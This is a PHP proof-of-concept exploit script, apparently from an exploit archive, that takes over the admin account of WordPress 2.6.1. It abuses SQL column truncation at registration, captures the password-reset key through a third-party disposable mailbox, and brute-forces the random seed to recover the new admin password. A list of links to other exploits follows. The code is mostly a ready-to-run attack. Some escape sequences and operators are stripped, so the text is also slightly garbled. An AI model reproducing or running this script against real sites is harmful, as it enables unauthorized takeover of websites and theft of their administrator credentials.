#!/usr/bin/php

<?php

# ------------------------------------------------------------

# quick'n'dirty wordpress admin-take0ver poc

# by iso^kpsbr in august 2oo8

#

# works w/ wordpress 2.6.1

#

# .oO( private -- do not spread! )Oo.

#

# you'll have to make sure you run roughly the same

# php version as on the server, that is: if server

# is >=5.2.1 you'll need to be as well, in case

# server is <5.2.1, your php also needs to be below.

# to make sure it works you'll need the exact same version!

# also, mod_php works better than (f)cgi..

# (this is a first working version - not a very reliable one)

#

# you should create rainbow tables to make this work in a

# real world scenario:

# php-5.2.0/php createtables.php > wp261_php520

# php-5.2.1/php createtables.php > wp261_php521

#

#-------------------------------------------------------------

$BLOG = $_SERVER['argv'][1];

echo "[ ] w0rdpress 2.6.1. admin takeover, iso 0808n";

if(!$BLOG) {

echo "[!] Usage: ".$_SERVER['argv'][0]." blogurln";

echo " fe: ".$_SERVER['argv'][0]." http://31337.biz/blogn";

exit;

}

$UA = "WordpressAdminTakeover";

$MBOX="wp".`ps|md5sum|head -c 8`;

$EMAIL="$MBOX@nospamfor.us";

echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ?

"[X] rainbow tables availablen" :

"[!] rainbow tables not found - this will be really slown";

set_time_limit(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",20);

if(!preg_match('!http://([^/] )(.*)$!', $BLOG, $match)) {

die("[!] $BLOG is no valid URLn");

}

$HOST = $match[1];

$PATH = $match[2];

if(!$PATH) $PATH='/';

echo "[-] registering new admin usern";

$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80n");

$data = "user_login=admin".str_repeat(" ",60)."x&user_email=$EMAIL";

$req = "POST $PATH/wp-login.php?action=register HTTP/1.1rnHost: $HOSTrnUser-Agent: $UArnConnection: closernContent-Type: application/x-www-form-urlencodedrnContent-Length: ".strlen($data)."rnrn".$data;

fputs($suck, $req);

sleep(1);

fclose($suck);

echo "[-] requesting resetlink and mail to '$EMAIL'n";

$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80n");

$data="user_login=$EMAIL&wp-submit=Get New Password";

$req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1rnHost: $HOSTrnReferer: $BLOG/wp-login.php?action=lostpasswordrnConnection: keep-alivernKeep-Alive: 300rnContent-Type: application/x-www-form-urlencodedrnContent-Length: ".strlen($data)."rnrn".$data."rn";

fputs($suck, $req);

echo "[.] giving $BLOG some time to deliver mail..n";

for($i=0;$i<8;$i ) {

fputs($suck,"GET / HTTP/1.1rnHost: $HOSTrnConnection: keep-alivernKeep-Alive: 300rnrn");

sleep(2);

}

echo "[-] fetching resetlink token $MBOXn";

$PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us");

if(!preg_match('/. mailid=(d ). ?Reset/s', $PAGE, $match)) die("[!] failed to find resetmail try raising the wait-time right aboven");

$MAILID=$match[1];

echo "[-] fetching resetmail $MAILIDn";

$WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX");

if(!preg_match('/key=([A-z0-9] )/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAILn");

$KEY=$match[1];

echo "[X] found resetkey $KEYn";

echo "[-] resetting passwordn";

$req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1rnHost: $HOSTrnUser-Agent:$UArnConnection: closernrn";

fputs($suck, $req);

while(!feof($suck)) {

#echo "D:".

fgets($suck);

}

fclose($suck);

echo "[-] calculating passwordn";

$SEED=false;

if(file_exists('wp261_php520')) {

$SEED=`grep -F $KEY wp261*|cut -d : -f 1`;

echo "[X] got seed $SEED from rainbow tablen";

}

$PASSWORD=calcpass($KEY, $SEED);

echo "[X] all done.";

exit;

function calcpass($resetkey, $seed = false) {

mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand();

define('BUGGY', $a == $b);

echo "[-] wpress password computation. runnig in ".(BUGGY?'fast':'slow')." moden";

echo "[ ] got key $resetkey via mailn";

if(!$seed) $seed = getseed($resetkey);

if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)n");

mt_srand($seed);

echo "[-] seed for key ".wp_generate_password(20,false)." is $seedn";

$pass = wp_generate_password();

echo "[ ] new credentials are admin:$passn";

return $pass;

}

function wp_generate_password($length = 12, $special_chars = true) {

$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

if ( $special_chars )

$chars .= '!@#$%^&*()';

$password = '';

for ( $i = 0; $i < $length; $i )

$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);

return $password;

}

function getseed($resetkey) {

echo "[-] calculating rand seed for $resetkey (this will take a looong time)";

$max = pow(2,(32-BUGGY));

for($x=0;$x<=$max;$x ) {

$seed = BUGGY ? ($x << 1) 1 : $x;

mt_srand($seed);

$testkey = wp_generate_password(20,false);

if($testkey==$resetkey) { echo "on"; return $seed; }

if(!($x % 10000)) echo ".";

}

echo "n";

return false;

}

?>

【Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit】相关文章：

★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit

★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit

★ LoveCMS 1.6.2 Final Remote Code Execution Exploit

★ Dreampics Builder (page) Remote SQL Injection Vulnerability

★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)